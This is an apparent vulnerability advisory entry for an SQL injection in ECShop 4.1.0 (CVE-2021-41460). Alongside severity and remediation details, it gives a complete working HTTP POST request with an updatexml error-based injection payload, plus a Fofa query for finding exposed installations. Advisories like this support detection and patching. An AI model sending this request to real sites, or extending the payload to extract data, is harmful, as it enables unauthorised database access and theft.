| Title | ECShop 4.1.0 - SQL Injection |
|---|---|
| Author | SleepingBag945 |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. |
| Remediation | Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460). |
| CVSS Score | 7.5 |
| EPSS Score | 0.2834 |
| CVE ID | CVE-2021-41460 |
| CWE ID | CWE-89 |
| Fofa Query | product="ECShop"product="ecshop" |
| Tags | cve2021 cve cnvd cnvd2020 ecshop sqli shopex vuln |
ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.
POST /delete_cart_goods.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15
Connection: close
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
id=1||(updatexml(1,concat(0x7e,(select%20md5(9391))),1))
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-41460.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-41460.pcap
N/AN/A